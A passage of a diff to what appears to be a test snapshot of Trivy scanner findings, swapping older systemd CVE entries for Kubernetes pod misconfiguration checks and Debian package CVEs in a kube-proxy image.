"attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33910", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(Pod 'etcd-kind-control-plane' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3374", + "installedVersion": "2.2.4", + "packageName": "apt", + "references": [ + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", + ], + }, + "category": "Vulnerability", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", + "references": [ { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33910.html", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-2717.html", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "1:2.36.1-8+deb11u1", + "packageName": "bsdutils", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0008/", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33910", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4942", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2021/07/20/2", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3997", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-2781", + "installedVersion": "8.32-4+b1", + "packageName": "coreutils", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3997", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", - "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5226-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3997", - "https://www.openwall.com/lists/oss-security/2022/01/10/2", + "http://seclists.org/oss-sec/2016/q1/452", + "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "https://access.redhat.com/security/cve/CVE-2016-2781", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lore.kernel.org/patchwork/patch/793178/", + "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "https://www.cve.org/CVERecord?id=CVE-2016-2781", ], }, "category": "Vulnerability", - "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: Uncontrolled recursion in systemd-tmpfiles when removing files", + "name": "coreutils: Non-privileged session can escape to the parent session in chroot", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3997", + "value": "https://avd.aquasec.com/nvd/cve-2016-2781", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3997", + "value": "http://seclists.org/oss-sec/2016/q1/452", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", + "value": "https://access.redhat.com/security/cve/CVE-2016-2781", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5226-1", + "value": "https://lore.kernel.org/patchwork/patch/793178/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3997", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/10/2", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-18018", + "installedVersion": "8.32-4+b1", + "packageName": "coreutils", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "https://access.redhat.com/security/cve/CVE-2017-18018", + "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "https://www.cve.org/CVERecord?id=CVE-2017-18018", ], }, "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", + "name": "coreutils: race condition vulnerability in chown and chgrp", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", + "value": "https://avd.aquasec.com/nvd/cve-2017-18018", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", + "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", + "value": "https://access.redhat.com/security/cve/CVE-2017-18018", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.20.10", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1664", + "installedVersion": "1.20.9", + "packageName": "dpkg", + "references": [ + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", + "https://lists.debian.org/debian-security-announce/2022/msg00115.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", + "https://security.netapp.com/advisory/ntap-20221007-0002/", + "https://ubuntu.com/security/notices/USN-5446-1", + "https://ubuntu.com/security/notices/USN-5446-2", + ], + }, + "category": "Vulnerability", + "description": "Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Dpkg::Source::Archive in dpkg, the Debian package management system, b ...", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-1664", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://lists.debian.org/debian-security-announce/2022/msg00115.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://security.netapp.com/advisory/ntap-20221007-0002/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://ubuntu.com/security/notices/USN-5446-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://ubuntu.com/security/notices/USN-5446-2", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "fixedVersion": "2.2.27-2+deb11u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-34903", + "installedVersion": "2.2.27-2+deb11u1", + "packageName": "gpgv", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "http://www.openwall.com/lists/oss-security/2022/07/02/1", + "https://access.redhat.com/errata/RHSA-2022:6602", + "https://access.redhat.com/security/cve/CVE-2022-34903", + "https://bugs.debian.org/1014157", + "https://bugzilla.redhat.com/2102868", + "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", + "https://dev.gnupg.org/T6027", + "https://errata.almalinux.org/9/ALSA-2022-6602.html", + "https://errata.rockylinux.org/RLSA-2022:6602", + "https://linux.oracle.com/cve/CVE-2022-34903.html", + "https://linux.oracle.com/errata/ELSA-2022-6602.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + "https://security.netapp.com/advisory/ntap-20220826-0005/", + "https://ubuntu.com/security/notices/USN-5503-1", + "https://ubuntu.com/security/notices/USN-5503-2", + "https://www.cve.org/CVERecord?id=CVE-2022-34903", + "https://www.debian.org/security/2022/dsa-5174", + "https://www.openwall.com/lists/oss-security/2022/06/30/1", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "name": "Signature spoofing via status line injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + "value": "https://avd.aquasec.com/nvd/cve-2022-34903", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", + "value": "http://www.openwall.com/lists/oss-security/2022/07/02/1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + "value": "https://access.redhat.com/errata/RHSA-2022:6602", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", + "value": "https://access.redhat.com/security/cve/CVE-2022-34903", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", + "value": "https://bugs.debian.org/1014157", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "https://bugzilla.redhat.com/2102868", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "https://dev.gnupg.org/T6027", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-6602.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://errata.rockylinux.org/RLSA-2022:6602", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://linux.oracle.com/cve/CVE-2022-34903.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-6602.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220826-0005/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5503-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5503-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-34903", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5174", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/06/30/1", }, ], "severity": "MEDIUM", @@ -145455,233 +147029,248 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3219", + "installedVersion": "2.2.27-2+deb11u1", + "packageName": "gpgv", "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "https://access.redhat.com/security/cve/CVE-2022-3219", + 